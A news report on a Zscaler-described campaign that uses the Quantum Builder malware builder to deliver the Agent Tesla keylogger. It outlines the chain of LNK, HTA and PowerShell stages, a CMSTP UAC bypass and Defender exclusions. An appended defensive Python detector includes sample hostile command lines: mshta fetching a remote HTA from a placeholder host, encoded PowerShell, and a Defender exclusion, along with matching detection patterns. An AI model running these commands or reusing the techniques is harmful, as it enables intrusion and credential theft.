A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity company Zscaler.

Quantum Builder, also known as Quantum LNK Builder, is used to create malicious shortcut files. It has been linked to Lazarus, an APT (advanced persistent threat) actor linked to North Korea, due to shared tactics, techniques and procedures (TTPs) and source code overlap. "But we cannot confidently attribute this campaign to any specific threat actor," Zscaler noted in a blog post.

Agent Tesla was first detected in 2014. In the current campaign, Quantum Builder is being used to generate malicious .lnk, .hta, and PowerShell payloads, which then deliver Agent Tesla to the targeted machines, according to Zscaler.

"This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler noted.

Quantum Builder used in a string of new malware attacks

Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. "This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations," Zscaler noted.

The payloads generated by the builder employ sophisticated techniques such as a user account control (UAC) bypass using the Microsoft Connection Manager Profile Installer (CMSTP) binary to execute the final payload with administrative privileges and to add Windows Defender exclusions.

The new malware campaign has also been seen utilizing a multistage infection chain integrating various attack vectors, Zscaler said. It executes PowerShell scripts in memory to evade detection and has also been seen executing decoys to distract victims after devices have been infected.

New attacks start with spear phishing email

The attack chain starts with a spear-phishing email that contains a GZIP attachment. The GZIP archive includes a shortcut designed to execute PowerShell code that launches a remote HTML application using the mshta.exe binary.

The phishing email looks as if it is from a Chinese supplier of lump and rock sugar. It has a subject line stating "New Order Confirmation - Guangdong Nanz Technology co. ltd." and carries a malicious .lnk file with a PDF icon.

Once the document is opened, the HTA file decrypts a PowerShell loader script, which in turn decrypts and loads another PowerShell script after performing Advanced Encryption Standard (AES) decryption and GZIP decompression.

The decrypted PowerShell script is the Downloader PS Script, which first downloads the Agent Tesla binary from a remote server and then executes it with administrative privileges by performing a user account control (UAC) bypass using CMSTP. Agent Tesla is then executed on the target machine with administrative privileges.

A second variant of Agent Tesla was also observed, in which the threat actors used a ZIP file and other sophisticated methods to hide their activities.

Agent Tesla has been active since 2014; in 2018 it had more than 6,300 customers paying subscription fees to license the software. Currently, Agent Tesla is being sold for $182 a month on the dark web, according to Hacker News.

Quantum Builder was first discovered by Cyble Research Labs in June this year on a cybercrime forum. The threat actor claimed in the post that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. A video was also posted demonstrating how to build .lnk, .hta, and .iso files using the malware builder.

The .hta payload can be created using Quantum Builder by customizing options such as payload URL, DLL (dynamic link library), UAC bypass, and execution path details, as well as a time delay before executing the payload.
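As an added example (not code from Zscaler's report or from this article), the following Python checks constructed Sysmon-style process-creation events for the stages of the chain described above: encoded PowerShell run from the shortcut, PowerShell launching mshta.exe against a remote HTA, a Windows Defender exclusion being added, and cmstp.exe executing under a PowerShell lineage. The event field names and sample events are assumptions made for the example.

```python
import re

# Constructed sample Sysmon-style process-creation events (not real telemetry).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgA"},
    {"pid": 300, "ppid": 200, "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/order.hta"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": "powershell.exe -c Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"pid": 500, "ppid": 400, "image": "cmstp.exe",
     "cmdline": "cmstp.exe C:\\Users\\Public\\profile.inf"},
    {"pid": 600, "ppid": 100, "image": "winword.exe", "cmdline": "winword.exe invoice.docx"},
]


def ancestors(pid, by_pid):
    """Yield the lowercased image name of each ancestor of pid, nearest first."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            yield by_pid[pid]["image"].lower()


def detect(events):
    """Return (rule, pid) pairs for events that match a stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cmd = e["image"].lower(), e["cmdline"]
        from_ps = "powershell.exe" in ancestors(e["pid"], by_pid)
        # Stage 1: the shortcut runs encoded PowerShell (in-memory execution).
        if img == "powershell.exe" and re.search(r"(?i)\s-(enc|encodedcommand)\b", cmd):
            hits.append(("encoded_powershell", e["pid"]))
        # Stage 2: PowerShell launches mshta.exe against a remote HTA.
        if img == "mshta.exe" and from_ps and re.search(r"(?i)https?://", cmd):
            hits.append(("powershell_launches_remote_hta", e["pid"]))
        # Stage 3: the downloader script adds Windows Defender exclusions.
        if img == "powershell.exe" and re.search(r"(?i)add-mppreference.*-exclusion", cmd):
            hits.append(("defender_exclusion_added", e["pid"]))
        # Stage 4: CMSTP (used for the UAC bypass) runs under a PowerShell lineage.
        if img == "cmstp.exe" and from_ps and cmd.lower().endswith(".inf"):
            hits.append(("cmstp_from_powershell", e["pid"]))
    return hits
```

Run against real endpoint telemetry, the ancestry walk is what separates this chain from legitimate cmstp.exe or mshta.exe use, since neither normally descends from PowerShell.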